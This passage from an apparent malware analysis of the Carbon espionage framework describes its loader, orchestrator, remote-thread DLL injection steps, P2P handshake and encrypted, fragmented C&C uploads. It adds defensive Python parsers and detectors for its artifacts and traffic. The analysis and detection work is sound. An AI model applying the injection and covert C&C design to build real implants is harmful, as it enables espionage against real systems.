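    return int(t["task_min"]), int(t["task_max"])


def named_pipe(cp):
    """Pipe name used to talk to the injected library."""
    return cp["TRANSPORT"].get("system_pipe", "")


if __name__ == "__main__":
    conf = load_config(CARBON_CONF)
    for host, port, path in endpoints(conf, "CW_INET"):
        print(f"C&C: {host}:{port}{path}")
    print("inject into:", ", ".join(injection_targets(conf)))
    print("pipe:", named_pipe(conf), "task window (ms):", task_window_ms(conf))
```

The host and path parts are what to turn into blocking rules; the path matters because the C&C servers are compromised legitimate sites, so blocking the whole domain may not be the right call.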

Logfile

The Carbon framework includes a logfile that is used to log actions performed by the malware and information on the system that can be useful to the malware operator (for example if an analysis tool such as WireShark is running on the machine).

The log’s format has not changed since Carbon 3.71:

  • Date|Time|Object-Id|Source|Message

example:
[LOG]
start=1
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|
20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK

This file is periodically backed up and sent to the C&C.

Dropper

The dropper is the only executable that is not a DLL. It is the first PE file to be executed: it is used to extract the other components from its resources.

The PE files that are used to load the main components are extracted into the Windows system directory while the orchestrator, the library used to communicate with the C&C and the configuration file are extracted into the Carbon working directory.

A new section is appended to a random “.inf” file from %SystemRoot%\INF. The section’s name is the volume serial number of the compromised machine’s disk, and a value “root” is created holding the chosen Carbon working directory.

Example:
[5049654F]
root="C:\Program Files\Windows Portable Devices"

Loader

This part of the component is used to load the orchestrator.

A service that ensures Carbon’s persistency is created. Its name can be “srservice”, “ipvpn” or “hkmsvc” depending on the operating system version running on the compromised machine.

The Carbon working directory is retrieved by walking through the “%windir%\inf” folder and looking for the file that contains the Carbon base path.

Last but not least, the function “ModuleStart” (in Carbon 3.71) or “ModStart” (since Carbon 3.77) from the orchestrator (located in the Carbon base folder) is called.
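Because the loader recovers the working directory this way, the marker is a cheap hunting artifact: a section named like a volume serial number that carries a root value has no business in a driver .inf file. The following is an added Python example (not the article's code and not the malware's) that scans .inf text for such sections and walks an INF directory; the two .inf snippets are constructed, with the marker copied from the example above, and the directory scanner handles the UTF-16 encoding that real .inf files often use.

```python
import os
import re

# [Section] header, a section name that looks like a volume serial number
# (8 hex digits), and a root = "path" value, which is the Carbon marker.
SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
SERIAL_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
ROOT_RE = re.compile(r'^\s*root\s*=\s*"?(?P<path>[^"\r\n]+?)"?\s*$', re.IGNORECASE)


def find_carbon_markers(inf_text):
    """Return (section_name, path) for every serial-number-named section with a
    'root' value. configparser is avoided on purpose: real .inf files carry
    duplicate keys and odd syntax that a strict INI parser rejects."""
    found = []
    current = None
    for line in inf_text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name").strip()
            continue
        if current and SERIAL_RE.match(current):
            r = ROOT_RE.match(line)
            if r:
                found.append((current.upper(), r.group("path")))
    return found


def read_text(path):
    """Decode an .inf file; many are UTF-16 with a BOM, the rest are treated as UTF-8."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="ignore")
    return data.decode("utf-8", errors="ignore")


def scan_inf_dir(directory):
    """Scan every .inf under a directory (e.g. %SystemRoot%\\INF) and return
    {file_path: markers} for the files that contain a marker."""
    report = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if not name.lower().endswith(".inf"):
                continue
            path = os.path.join(root, name)
            markers = find_carbon_markers(read_text(path))
            if markers:
                report[path] = markers
    return report


# Constructed sample .inf content: a plausible, harmless driver file ...
CLEAN_INF = """\
[Version]
Signature="$Windows NT$"
Class=Ports
Provider=%Msft%

[Strings]
Msft="Microsoft"
"""

# ... and the same file with the marker from the article's example appended.
SUSPECT_INF = CLEAN_INF + """
[5049654F]
root="C:\\Program Files\\Windows Portable Devices"
"""


if __name__ == "__main__":
    print(find_carbon_markers(SUSPECT_INF))   # [('5049654F', 'C:\\Program Files\\Windows Portable Devices')]
    print(find_carbon_markers(CLEAN_INF))     # []
```

Run scan_inf_dir against the system INF folder of a suspect machine; the returned path is the Carbon working directory, which is where the files listed in the tree views above should then be looked for.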

Orchestrator

The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP.

Seven threads are created by the malware. It is easy to identify Carbon’s characteristics because each thread has a specific role:

Configuration fetching

Because the configuration file can be updated by the malware, some attributes like the C&C server addresses are monitored every 10 minutes.

Check Carbon storage folder periodically

There is a storage folder located in the Carbon working directory. This folder contains some files downloaded from the C&C server (tasks that are either commands to be executed or PE files, and their configuration files).

This thread will run continuously and check every two hours [5] whether there is still enough space available in this folder; if not, a notification is written into the logfile.

Task execution

The execution of the tasks in the context of the orchestrator process is very similar to the way in which it is performed in the communication library (cf Communication library / Tasks execution).

Unlike the communication library, it is the file “encodebase.inf” (for Carbon v3.8x) or “a67ncode.ax” that contains the list of the tasks to execute.

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | [execution_mode | username | password]

The five first fields are required, while the last three are optional. If the field “execution_mode” exists, its value will affect the way the task is executed:

  • 0 or 1: normal execution
  • 2: the task is executed in the security context of a specific user (credentials are provided through the username/password fields)
  • 3 or 4: the task is executed in the security context of the user represented by the “explorer.exe” token
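Parsers for the log line format described earlier (Date|Time|Object-Id|Source|Message) and for the task list line format just above, as an added Python example that is not part of the original article. The sample log lines are the ones from the article's example; the task lines are constructed, with placeholder paths (built on the working directory from the article's .inf example) and placeholder credentials.

```python
TASK_REQUIRED = ("task_id", "task_filepath", "task_config_filepath",
                 "task_result_filepath", "task_log_filepath")

# Meaning of the optional execution_mode field, as given in the article.
EXEC_MODES = {
    0: "normal",
    1: "normal",
    2: "security context of the user given by username/password",
    3: "security context of the explorer.exe token owner",
    4: "security context of the explorer.exe token owner",
}


def parse_task_line(line):
    """Parse one line of the task list (a67ncodc.ax / encodebase.inf).
    Five fields are required; execution_mode, username and password are optional."""
    fields = [f.strip() for f in line.strip().strip("|").split("|")]
    if len(fields) < 5:
        raise ValueError("task line needs the five required fields")
    task = dict(zip(TASK_REQUIRED, fields[:5]))
    mode = int(fields[5]) if len(fields) > 5 and fields[5] else None
    task["execution_mode"] = mode
    task["execution"] = "normal" if mode is None else EXEC_MODES.get(mode, "unknown")
    task["username"] = fields[6] if len(fields) > 6 and fields[6] else None
    # Never copy the password out of the artifact; only record that one was supplied.
    task["password_present"] = len(fields) > 7 and bool(fields[7])
    return task


def parse_log_line(line):
    """Parse Date|Time|Object-Id|Source|Message. The message keeps any further
    '|' separators, which the real entries use (e.g. 'ST|3/81|0')."""
    parts = line.strip().rstrip("|").split("|", 4)
    if len(parts) < 5:
        return None
    date, time, object_id, source, message = parts
    return {"date": date, "time": time, "object_id": object_id,
            "source": source, "message": message}


def victim_ids(lines):
    """Distinct object_ids seen in a log: one per compromised host."""
    ids = set()
    for line in lines:
        entry = parse_log_line(line)
        if entry:
            ids.add(entry["object_id"])
    return ids


# Log lines from the article's example.
SAMPLE_LOG_LINES = [
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|",
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|",
    "20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK",
]

# Constructed task line: mode 2 with placeholder credentials.
BASE = r"C:\Program Files\Windows Portable Devices"
SAMPLE_TASK = "|".join([
    "7",
    BASE + r"\0409\task7.exe",
    BASE + r"\0409\task7.cfg",
    BASE + r"\1033\task7.res",
    BASE + r"\1033\task7.log",
    "2",
    r"PLACEHOLDER_DOMAIN\operator",
    "PLACEHOLDER_PASSWORD",
])


if __name__ == "__main__":
    t = parse_task_line(SAMPLE_TASK)
    print(t["task_id"], t["execution"], t["username"], t["password_present"])
    print(victim_ids(SAMPLE_LOG_LINES))
```

Both parsers work on decrypted content; the files on disk are CAST-128 encrypted, so the text has to be recovered first (the C_56743.NLS / dsntype.gif list is the one exception the article notes).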

P2P

Like Uroburos/Snake, Carbon can dispatch tasks to other computers from the same network via named pipe or TCP. It is useful to be able to dispatch and execute tasks on computers that do not have Internet access.

Communication channels

Uroburos used several types of communication transports that can be categorized as follows:

  • type 1: TCP
  • type 2: enc, np, reliable, frag, m2b, m2d
  • type 3: t2m
  • type 4: UDP, doms, domc

Carbon uses a reduced number of communication channels:

  • type 1: TCP, b2m
  • type 2: np, frag, m2b

The data sent to peers are usually fragmented and transported either over TCP or via a named pipe. If, for example, fragmented data are sent from one computer to another over a named pipe, an object “frag.np” is set up. In this case the constructor of the parent class “frag” is called first, followed by the constructor of the subclass “np”.

Each object has a structure of handlers: initialize communication, connect (to a pipe / IP address), read data, send data, etc.

How a task is forwarded to another computer

Several steps are performed to send data from one computer to another:

  • a communication channel is created (frag.np or frag.tcp object) with a specific named pipe / ip address
  • options are given to the communication object (for example: the fragment size, information about the peer, etc.)
  • connection to the peer
  • an authentication step is performed between the host and the peer:
    • there is a handshake process where the host is sending the “magic” value “A110EAD1EAF5FA11” and expects to receive “C001DA42DEAD2DA4” from the peer
    • a command “WHO” is sent to the peer where the host sends the victim uuid and expects to receive the same uuid
  • if the authentication was successful, the data are sent to the peer

All communication between the host and the peer is encrypted with CAST-128.

Note that this P2P feature is also implemented in the communication DLL.

Plugins

This malware supports additional plugins to extend its functionalities.

In the configuration file, there is a section named “PLUGINS”. It might not exist when the configuration file is dropped from the loader resources, but this file can be updated by the malware. Each line of the “PLUGINS” section is formed this way:

  • %plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%

%file_path% can be either the path to a PE file or to a file containing a command line to be executed. %enabled% is a string indicating whether the plugin has to be executed; if so, its value is “enabled”.

The attribute %mode% is used to control the context in which to execute the PE file/command line. It can be either:

  • 1 = execution with the current user's privileges in the current process context through CreateProcess().
  • 2 = execution as the user specified in the configuration (:%username%:%password% attributes); the token of this user is retrieved through the LogonUserAs() function.
  • 3 = execution in the security context of the user represented by the “explorer.exe” token (the token of the “explorer.exe” process is duplicated and passed to the CreateProcessAsUser() function).
  • 4 = similar to 3, but the environment variables of the user represented by the “explorer.exe” token are also retrieved and passed to CreateProcessAsUser().

If it is a PE file:

  • the file is loaded into the malware process memory
  • the module is parsed to check if it is a DLL
  • if the module is a DLL and exports a function “ModStart” (since Carbon 3.77) or “ModuleStart” (for older versions of Carbon), a new thread is created to execute this function.
  • if the module is not a DLL but a valid PE, it is executed from the entry point.
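The task-list lines and the [PLUGINS] lines described above share the same pipe-delimited layout. As an added example (not ESET's or the malware's code), the following parser turns both into records an analyst can inspect, applying the field rules above; all sample lines, paths and credentials are constructed placeholders.

```python
# Added example, not ESET's or the malware's code: parse the two pipe-delimited line
# formats the orchestrator reads (task-list lines and [PLUGINS] lines) into records,
# applying the field rules described in the write-up. Sample lines are constructed.
from dataclasses import dataclass
from typing import List, Optional

# Meaning of the optional execution_mode field, as described in the write-up.
EXECUTION_MODES = {
    0: "normal execution",
    1: "normal execution",
    2: "run as the user given by username/password",
    3: "run in the security context of the explorer.exe token",
    4: "run in the security context of the explorer.exe token",
}


@dataclass
class TaskEntry:
    task_id: str
    task_path: str
    config_path: str
    result_path: str
    log_path: str
    execution_mode: Optional[int] = None
    username: Optional[str] = None
    password: Optional[str] = None

    def describe_context(self) -> str:
        mode = 0 if self.execution_mode is None else self.execution_mode
        return EXECUTION_MODES.get(mode, "unknown execution mode %d" % mode)


@dataclass
class PluginEntry:
    name: str
    enabled: bool
    mode: int
    username: Optional[str]
    password: Optional[str]
    file_path: str


def parse_task_line(line: str) -> TaskEntry:
    """Parse 'task_id | task | config | result | log | [mode | user | pass]'."""
    fields = [f.strip() for f in line.rstrip("\r\n").split("|")]
    if len(fields) not in (5, 6, 8):
        raise ValueError("expected 5, 6 or 8 fields, got %d" % len(fields))
    entry = TaskEntry(*fields[:5])
    if len(fields) >= 6 and fields[5] != "":
        entry.execution_mode = int(fields[5])
    if len(fields) == 8:
        entry.username, entry.password = fields[6], fields[7]
    # Mode 2 runs the task as a specific user, so credentials must be present.
    if entry.execution_mode == 2 and entry.username is None:
        raise ValueError("execution_mode 2 requires username and password")
    return entry


def parse_plugin_line(line: str) -> PluginEntry:
    """Parse '%plugin_name%=%enabled%|%mode%[:%username%:%password%]|%file_path%'."""
    name, sep, rest = line.rstrip("\r\n").partition("=")
    if not sep:
        raise ValueError("missing '=' in plugin line")
    parts = [p.strip() for p in rest.split("|")]
    if len(parts) != 3:
        raise ValueError("expected enabled|mode|file_path, got %d fields" % len(parts))
    enabled_str, mode_str, file_path = parts
    mode_fields = mode_str.split(":")
    if len(mode_fields) not in (1, 3):
        raise ValueError("mode must be 'mode' or 'mode:username:password'")
    mode = int(mode_fields[0])
    username = password = None
    if len(mode_fields) == 3:
        username, password = mode_fields[1], mode_fields[2]
    if mode == 2 and username is None:
        raise ValueError("plugin mode 2 requires credentials")
    # Only the literal string "enabled" switches a plugin on.
    return PluginEntry(name.strip(), enabled_str == "enabled", mode, username, password, file_path)


def triage(task_lines: List[str], plugin_lines: List[str]) -> List[str]:
    """One human-readable line per entry, for a quick look at a decrypted working directory."""
    report = []
    for line in task_lines:
        t = parse_task_line(line)
        report.append("task %s: %s (%s)" % (t.task_id, t.task_path, t.describe_context()))
    for line in plugin_lines:
        p = parse_plugin_line(line)
        state = "enabled" if p.enabled else "disabled"
        report.append("plugin %s: %s, mode %d, %s" % (p.name, p.file_path, p.mode, state))
    return report


# Constructed sample lines (paths, ids and credentials are placeholders).
SAMPLE_TASK_LINES = [
    "1|C:\\w\\Nls\\t1.bin|C:\\w\\Nls\\t1.cfg|C:\\w\\0208\\r1.tmp|C:\\w\\0208\\l1.tmp",
    "2|C:\\w\\Nls\\t2.bin|C:\\w\\Nls\\t2.cfg|C:\\w\\0208\\r2.tmp|C:\\w\\0208\\l2.tmp|3",
    "3|C:\\w\\Nls\\t3.bin|C:\\w\\Nls\\t3.cfg|C:\\w\\0208\\r3.tmp|C:\\w\\0208\\l3.tmp|2|svc_user|placeholder",
]
SAMPLE_PLUGIN_LINES = [
    "updater=enabled|1|C:\\w\\plug\\upd.dll",
    "collector=disabled|2:backup:placeholder|C:\\w\\plug\\col.exe",
]

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_TASK_LINES, SAMPLE_PLUGIN_LINES)))
```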

Injection of the communication library into remote processes

The library that is used to communicate with the C&C server is injected into remote processes. In order to know where to inject this DLL, the configuration file is parsed. The section “[NAME]” contains a field “iproc” holding a list of processes that can legitimately communicate with the Internet.

Example:

[NAME]
iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe

For each process on the list that is running on the system, if its parent process name is either “explorer.exe” or “ieuser.exe”, the DLL will be injected into this process.

The process injection is very classical:

  • the functions “CreateToolhelp32Snapshot / Module32FirstW / Module32NextW” are used to retrieve the base address of the module “kernel32.dll”
  • the module EAT is parsed to get the address of the function “LoadLibraryW”
  • the privilege “SeDebugPrivilege” is enabled for the current process
  • memory is allocated into the remote process and the library path is written into it
  • NtCreateThreadEx or CreateRemoteThread (if the address of the first function cannot be retrieved) is called to execute LoadLibraryW, which loads the DLL into the memory of the remote process

Communication library

The following analysis is based on the version 4.x of msximl. This component may have changed in the latest versions.

Configuration fetching

Besides the code in the “Configuration fetching” thread from the orchestrator (which is similar), a field “sethttp1” is retrieved from the [TRANSPORT] section.

If this value is set, HTTP 1.1 will be used for future connections.

Tasks execution

The tasks are retrieved from the C&C server.

The tasks to be executed by the communication library are listed in the file “b9s3coff.ax” (for Carbon v3.7x) or “cifrado.xml” (for Carbon v3.8x).

Each line of this file is composed in the following way:

  • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath

The task file and its configuration are decrypted (CAST-128) and the task is executed. Some options are retrieved from the Carbon configuration file: “time2task” sets a timeout for the task execution (1 hour by default), while “task_min” and “task_max” bound the random delay between the executions of the tasks on the task list (the delay is chosen between “task_min” and “task_max”). These parameters come from the section [TIME].

If the task is a valid DLL file, it is loaded into the current process memory and a new thread is created to execute its “start” export. Otherwise, it is probably a command to execute. In this case, the task configuration file is parsed. Like the Carbon configuration file, the task configuration file is formed as a Windows “inf” file and should contain a section [CONFIG] with the following parameters:

  • [CONFIG]
    • NAME (“cmd.exe” by default)
    • ARG
    • RESULT (“stdout” by default)
    • COMPRESSION (“yes” by default)
    • DELETE (“no” by default)

The command with its arguments is executed through the CreateProcess() function; the results are stored in the %task_result_filepath% file if the RESULT option is not set to “stdout”, while errors or additional info are added to the task logfile.

If the option RESULT is set to stdout:

  • the task result file is deleted and the task's output is written to the task log file
  • the line “task_id | “1” | task_log_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

Otherwise:

  • the task's output is written to the task result file and the errors / additional info to the task logfile
  • the line “task_id | “2” | task_log_filepath | task_result_filepath | object_id” is added at the end of the file “C_56743.NLS” (Carbon 3.7x) or “dsntype.gif” (Carbon 3.8x)

In both cases, the same line as written into “C_56743.NLS” is also written into the field “run_task” of the Carbon configuration file. It is probably intended as a way for the malware authors to know which task was executed last when the configuration file is sent to the C&C server (see “Configuration file backup”).

Log rotation

The logfile is backed up and sent to the C&C server periodically (by default this is done every two hours).

Like the backup of the configuration file, this action is performed only during specific times of the day: the log rotation is performed only when the current local time is within the range defined in the configuration file.

The fields “wh_min” and “wh_max” are retrieved from the [TIME] section of the configuration file (by default: 8 and 20). The thread will execute the code only if the current hour of the day is between %wh_min% and %wh_max%.

If there is a value for the attribute “timestop” from the [TIME] section (which looks like “wDay:wMonth:wYear:wHour:wMinute”), the thread will execute the code only after this specific datetime.

The attributes “lastsend” and “logperiod” from the [LOG] section determine when the log is next backed up and sent to the C&C server (by default every two hours).

A temporary file with a random name prefixed by “~D” is created in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). The logfile content is copied into this new file. It is then compressed with Bzip2 and encrypted (CAST-128).

A new line is added at the end of the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “10|1|%s|%s”
    • 1st field: an ID to identify the file as a logfile
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp file path
    • 4th field: the victim uuid

Last but not least, the attribute “lastsend” is updated with the current time and the original logfile is deleted.

Communication with the C&C server

The code of this thread is used to retrieve new tasks from the C&C server, to send new files to the server (the files listed in the file “C_56743.NLS” / “dsntype.gif”) and to send the new tasks to the orchestrator.

First request

A random C&C server address is chosen from the ones in the section “CW_INET”. If the port and HTTP resource path are not specified, the default is to use port 80 and “/javascript/view.php”.

A user agent is set up in the following way:

  • the version of Internet Explorer is retrieved through the registry key: “HKLM\Software\Microsoft\Internet Explorer\Version” and is concatenated to the string “Mozilla/4.0 (compatible; MSIE %d.0; ”
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0;”
  • concatenate the previous string with the OS major/minor version values (through GetVersionExA())
    • “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0”
  • enumerate the values under the key “HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform”, append each value to the previous string and then append a closing parenthesis.
    • example: “Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0; SLCC2)”

The field “trans_timemax” from the section [TIME] is retrieved. It is used to set the timeout for internet requests (through InternetSetOption()). It has a value of 10 minutes by default.

A first GET request is performed on the root page of the C&C web server to check that the host is alive. If no packet capture is running on the system, a new request is done on the C&C server to check if new tasks are available. A “PHPSESSID” cookie is added to the request with the victim uuid as its value. A header “Referer” is added as well and set to the C&C server URL.

The malware is expecting to get an answer to the GET request similar to:

  • <input name="%name%" value="%data_in_b64%">

If the field “value” contains something, a new task is available.

Send data to the server

If the file “C_56743.NLS” / “dsntype.gif” is not empty, there are data to be sent to the C&C server. The file is parsed and its last line is retrieved; it contains details about the data to be sent. A data blob is built, and each of the following fields is encrypted with CAST-128:

  • id | val | tmp_filesize | tmp_content | [OPTIONAL (if val == 2) tmp2_filesize | tmp2_content] | len_object_id | object_id
    • id = the type of data to send to the C&C server, it can be:
      • 10: log backup
      • 11: configuration file
      • 20: a cryptographic key
      • otherwise: an id associated to a task, it can be the result of a task or an error log in the case of task execution failure
    • val = 1 if there is only one file to send, 2 if there are two files
    • object_id = the victim uuid

If the field “dtc” from the section [CRYPTO] of the configuration file is set to 0, this whole blob is base64 encoded and sent to the C&C server through a POST request.

Otherwise, another layer of encryption is used. In this case, the data blob is signed and a random 3DES key is used to encrypt it. Because the 3DES key is randomly generated and the server needs it to decrypt the data, the key is encrypted with the server public key. The server key is retrieved from the field “publicc” of the section [CRYPTO] from the configuration file.

This new blob (encrypted_key | signature_data | encrypted data) is encoded in base64 and sent to the C&C server through a POST request.

In order to avoid detection based on the data size sent in a request, the blob can be fragmented into several packets. An option in the configuration file (“post_frag” in the section [TRANSPORT]) defines whether the blob will be fragmented or sent in only one POST request.

If this option is set to “yes”, the blob is divided into several fragments of a specific size. This size comes from another field in the configuration file: “post_frag_size”.

An additional header will be added to the request:

  • “Content-Range: bytes %u-%u/%u; id=%u\r\n”, i, i+(fragment_size-1), data_size, task_id

If the option http11 is set, a specific header is added as well:

  • “Expect: 100-continue\r\n”

For each fragment sent, the fields “post_frag_size” and “pfslastset” of the config file (section [CW_INET_RESULTS]) are updated with the fragment size and the timestamp.
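The first request and the fragmented POST described above leave several traits in proxy logs: the MSIE token built from the full registry version string, the default “/javascript/view.php” path, the PHPSESSID cookie with a self-referencing Referer, and a Content-Range request header carrying an id= suffix. As an added example (not ESET's code), the following detector scores constructed log lines on those traits; the log line format, hostnames and cookie value are assumptions made for the example.

```python
# Added example, not ESET's code: flag proxy-log requests showing the beacon traits
# described in the write-up (the oddly formed MSIE token, the default C&C path, the
# PHPSESSID cookie with a self-referencing Referer, and the fragmented-POST
# Content-Range header). The log line format and all sample lines are constructed.
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Carbon fills "MSIE %d.0" with the full registry version string, giving a token such as
# "MSIE 8.0.6001.18702.0;" where a real Internet Explorer sends "MSIE 8.0;".
ODD_MSIE_TOKEN = re.compile(r"MSIE \d+(?:\.\d+){3}\.0;")
# Content-Range is a response header; Carbon sends it on POST requests, with an "id=" suffix.
FRAG_CONTENT_RANGE = re.compile(r"^bytes \d+-\d+/\d+; id=\d+$")
DEFAULT_C2_PATH = "/javascript/view.php"
HEADER_RE = re.compile(r'([A-Za-z][\w-]*)="([^"]*)"')


def parse_line(line: str) -> Dict[str, str]:
    """Constructed format: METHOD URL followed by Header="value" pairs."""
    parts = line.strip().split(" ", 2)
    req = {"method": parts[0], "url": parts[1]}
    for name, value in HEADER_RE.findall(parts[2] if len(parts) > 2 else ""):
        req[name.lower()] = value
    return req


def beacon_indicators(req: Dict[str, str]) -> List[Tuple[str, int]]:
    """Return (reason, weight) pairs for the Carbon beacon traits present in one request."""
    found = []
    url = urlsplit(req["url"])
    if ODD_MSIE_TOKEN.search(req.get("user-agent", "")):
        found.append(("MSIE token built from the full registry version string", 2))
    if url.path == DEFAULT_C2_PATH:
        found.append(("default C&C resource path", 1))
    if req["method"] == "POST" and FRAG_CONTENT_RANGE.match(req.get("content-range", "")):
        found.append(("Content-Range request header with id= suffix (fragmented upload)", 2))
    referer = urlsplit(req.get("referer", ""))
    if referer.netloc and referer.netloc == url.netloc and "PHPSESSID=" in req.get("cookie", ""):
        found.append(("self-referencing Referer with PHPSESSID cookie", 1))
    if req["method"] == "POST" and req.get("expect", "").lower() == "100-continue":
        # Legitimate clients send this too, so it only adds context, not score.
        found.append(("Expect: 100-continue on upload", 0))
    return found


def analyze(lines: List[str], threshold: int = 2) -> Dict[int, List[str]]:
    """Map line index -> reasons for every request whose indicator weight reaches threshold."""
    flagged = {}
    for i, line in enumerate(lines):
        indicators = beacon_indicators(parse_line(line))
        if sum(weight for _, weight in indicators) >= threshold:
            flagged[i] = [reason for reason, _ in indicators]
    return flagged


# Constructed sample log lines; "c2.example.invalid" stands in for a real C&C host.
CARBON_UA = "Mozilla/4.0 (compatible; MSIE 8.0.6001.18702.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
SAMPLE_LINES = [
    'GET http://www.example.com/index.html User-Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/52.0"',
    'GET http://c2.example.invalid/javascript/view.php User-Agent="%s" '
    'Cookie="PHPSESSID=0f1e2d3c-4b5a-6978-8796-a5b4c3d2e1f0" Referer="http://c2.example.invalid/"' % CARBON_UA,
    'POST http://c2.example.invalid/javascript/view.php User-Agent="%s" '
    'Content-Range="bytes 0-1023/4096; id=7" Expect="100-continue"' % CARBON_UA,
    'POST http://upload.example.com/api/files User-Agent="curl/7.68.0" Expect="100-continue"',
]

if __name__ == "__main__":
    for index, reasons in analyze(SAMPLE_LINES).items():
        print("line %d: %s" % (index, "; ".join(reasons)))
```

A single weak trait (a site that happens to serve /javascript/view.php, or a legitimate Expect: 100-continue) never reaches the threshold on its own.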

Get new tasks

New tasks are retrieved from the C&C server by parsing the html page. The malware expects to find the html tag <input> in the page with a base64 encoded blob in its “value” attribute. Once decoded, this blob contains:

  • an encrypted block of 128 bytes that contains a structure “PUBLICKEYSTRUC” followed by a cryptographic key (probably a 3DES key)
  • signature data (128 bytes) to verify the integrity of the next block
  • a block of encrypted data that contains the task

The malware uses an RSA private key (retrieved from the field “keypair” from the section [CRYPTO] of the configuration file) to decrypt the first block and then uses the freshly decrypted key to decrypt the third block. This block of data can be either:

  • a task to be executed[6]
    • the data are decrypted and stored in a few temporary files: the task (a command or a PE file) and its configuration file in the “Nls” folder, and the output files (the file that will contain the task results, and the logfile) in the folder “0208” (respectively “0409” and “1033” for Carbon v3.8x)
    • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
    • this line is added to the beginning of the file “b9s3coff.ax” (cifrado.xml on v3.8x)
  • a task to be executed by the orchestrator[7]
    • the data are decrypted and stored in a few temporary files (the task, its configuration, etc.) in the “Nls” and “0208” folders (or “0409” and “1033” for Carbon v3.8x)
    • depending on the content of the data, one of these lines is added to the beginning of the file “a67ncode.ax” (encodebase.info on v3.8x)
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode | username | password
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode
  • a new RSA server public key
    • in this case, the configuration file is updated with the new key encoded in base64 (field publicc)
  • data to be sent to an instance of Carbon running on another computer in the same network
    • the data can contain a specific IP address and port, a named pipe, or a named pipe with a username and password.

Check Internet availability

Each hour, the internet connection is checked. A first check is done by calling the function InternetAttemptConnect(). If it works, another test is done by sending HTTP GET requests to the following websites:

  • www.google.com
  • www.yahoo.com
  • www.bing.com
  • update.microsoft.com
  • windowsupdate.microsoft.com
  • microsoft.com

An event is used to notify the other threads in case of the loss of Internet access.

Configuration file backup

Similar to the logfile, the configuration file is also periodically backed up and sent to the C&C server. The thread executes the code in a specific range of time (between 8h and 20h by default)[8].

The value “configlastsend” is retrieved from the section [TIME] of the configuration file. If the configuration file was last sent more than a month ago, it is copied into a temporary file with a random name prefixed by “~D” in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). This file is then encrypted with the CAST-128 algorithm.

To notify the thread that communicates with the C&C server that a new file is ready to be sent, the following line is appended to the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “11|1|%s|%s”
    • 1st field: an ID to identify the file as a config file
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp filepath
    • 4th field: the victim uuid

Last but not least, the attribute “configlastsend” is updated with the current time.
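The log rotation and configuration backup threads share the same gating rules (working-hour window, “timestop”, and a per-file “last sent” timestamp). As an added example (not ESET's code), the following emulation of those rules predicts when a given configuration will next produce an upload. Not stated in the write-up and assumed here: the window is inclusive, “logperiod” is in seconds, “over a month” means more than 30 days, and “lastsend”/“configlastsend” use the same “wDay:wMonth:wYear:wHour:wMinute” layout as “timestop”; the configuration text is constructed.

```python
# Added example, not ESET's code: emulate the scheduling rules of the log-rotation
# and configuration-backup threads to predict when a given configuration will next
# produce an upload. Assumptions not stated in the write-up: the working-hour window
# is inclusive, "logperiod" is in seconds, "over a month" means more than 30 days,
# and "lastsend"/"configlastsend" use the same "wDay:wMonth:wYear:wHour:wMinute"
# layout as "timestop". The configuration text below is constructed.
from configparser import ConfigParser
from datetime import datetime, timedelta
from typing import Optional

SAMPLE_CONFIG = """\
[TIME]
wh_min = 8
wh_max = 20
timestop = 15:3:2017:9:30
configlastsend = 1:1:2017:12:0
[LOG]
lastsend = 10:3:2017:4:0
logperiod = 7200
"""


def parse_systemtime(value: str) -> Optional[datetime]:
    """Parse the 'wDay:wMonth:wYear:wHour:wMinute' layout; an empty value means unset."""
    if not value.strip():
        return None
    day, month, year, hour, minute = (int(x) for x in value.split(":"))
    return datetime(year, month, day, hour, minute)


class CarbonSchedule:
    def __init__(self, config_text: str):
        cp = ConfigParser()
        cp.read_string(config_text)
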